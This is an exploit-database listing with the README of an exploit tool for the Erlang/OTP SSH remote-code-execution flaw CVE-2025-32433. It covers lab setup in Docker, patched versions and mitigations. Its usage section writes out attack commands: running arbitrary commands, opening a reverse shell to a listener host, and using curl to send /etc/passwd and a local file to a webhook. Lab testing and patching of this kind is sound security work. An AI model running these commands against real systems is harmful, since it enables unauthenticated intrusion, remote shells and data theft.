Exploit for CVE-2025-32433

Name: Exploit for CVE-2025-32433
Rating: 5 (128 reviews)
2025-04-19 | CVSS 10.0
## https://sploitus.com/exploit?id=8454C6E2-D0E9-5367-BBEF-67FB44F73F8C
# CVE-2025-32433 - Critical Erlang/OTP SSH Vulnerability

![SSH ERLANG EXPLOIT](image.png)

## Overview 🔍

CVE-2025-32433 is a critical vulnerability discovered in Erlang/OTP's SSH implementation that allows **unauthenticated remote code execution** via specially crafted SSH messages. This severe security flaw enables attackers to execute arbitrary code on affected systems without authentication.

* **What**: Remote Code Execution (RCE) via unauthenticated SSH messages in Erlang/OTP
* **Impact**: Full code execution, potentially as root, over the network
* **Affected**: Any system running an Erlang/OTP-based SSH server
* **Fix**: Upgrade to `OTP-27.3.3`, `OTP-26.2.5.11`, or `OTP-25.3.2.20`
* **Workaround**: Restrict SSH access using firewall rules

## Vulnerability Details ⚠️

Discovered by researchers at Ruhr University Bochum, this vulnerability stems from improper handling of SSH connection protocol messages in Erlang/OTP. It allows attackers to send maliciously crafted messages before authentication is completed, resulting in unauthenticated arbitrary code execution.

If the Erlang SSH daemon is running as root (a common configuration), successful exploitation grants full system control, making it a prime candidate for ransomware deployment, lateral movement through networks, or data exfiltration.

## Affected Versions 🐛

* <= OTP-27.3.2
* <= OTP-26.2.5.10
* <= OTP-25.3.2.19

## Lab Setup 🖥️

Follow these steps to set up a test environment:

1. **Install Docker and Docker Compose**
   ```bash
   sudo apt update
   sudo apt install apt-transport-https ca-certificates curl gnupg lsb-release
   curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
   sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
   sudo apt install docker-ce docker-ce-cli containerd.io
   sudo docker --version
   sudo curl -L "https://github.com/docker/compose/releases/download/v2.29.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
   sudo chmod +x /usr/local/bin/docker-compose
   docker-compose --version
   ```

2. **Build and Run the Vulnerable Container**
   ```bash
   docker build -t erlang-ssh .
   docker run -d --name erlang-ssh-container -p 2222:2222 -v /home/local.txt:/home erlang-ssh
   ```
3. **Set Up as a Service**

      To run the container as a service that starts automatically:
      
      a. Create a systemd service file:
      ```bash
      sudo nano /etc/systemd/system/erlang-ssh-vuln.service
      ```
      b. Add the following content:
      ```bash
      [Unit]
      Description=Erlang SSH Vulnerability Lab
      After=docker.service
      Requires=docker.service
      
      [Service]
      TimeoutStartSec=0
      Restart=always
      ExecStartPre=-/usr/bin/docker stop erlang-ssh-container
      ExecStartPre=-/usr/bin/docker rm erlang-ssh-container
      ExecStart=/usr/bin/docker run --name erlang-ssh-container -p 2222:2222 -v /home/local.txt:/home erlang-ssh
      ExecStop=/usr/bin/docker stop erlang-ssh-container
      
      [Install]
      WantedBy=multi-user.target
      ```
      
      c. Enable and start the service:
      ```bash
      sudo systemctl daemon-reload
      sudo systemctl enable erlang-ssh-vuln.service
      sudo systemctl start erlang-ssh-vuln.service
      ```


## Exploit Usage 🚀

The exploit script provides several options for testing and exploiting the vulnerability:

### Basic Syntax:
```bash
python exploit.py <host> [options]
```

### Check Vulnerability:
```bash
python exploit.py 172.32.33.28 -p 2222 --check
```

### Execute Command:
```bash
python exploit.py 172.32.33.28 -p 2222 -c 'ls -la'
```

### Get Reverse Shell:
```bash
python exploit.py 172.32.33.28 -p 2222 --shell --lhost 172.32.36.48 --lport 4444
```

### Alternative Data Exfiltration:
If direct commands don't work, you can use webhook-based exfiltration:
```bash
python exploit.py 172.32.33.28 -p 2222 -c "curl -X POST -d @/etc/passwd WEBHOOKURL"
```
```bash
python exploit.py 172.32.33.28 -p 2222 -c "curl -X POST -d @/home/local.txt WEBHOOKURL"
```

## Mitigation Steps 🛡️

1. **Update Erlang/OTP**:
   - Upgrade to `OTP-27.3.3`, `OTP-26.2.5.11`, or `OTP-25.3.2.20`
   - These patched versions properly validate SSH protocol messages

2. **Network Controls**:
   - Restrict access to SSH services with firewall rules
   - Implement network segmentation to isolate critical systems

3. **Monitoring**:
   - Deploy intrusion detection/prevention systems to monitor for exploitation attempts
   - Enable enhanced logging for SSH connections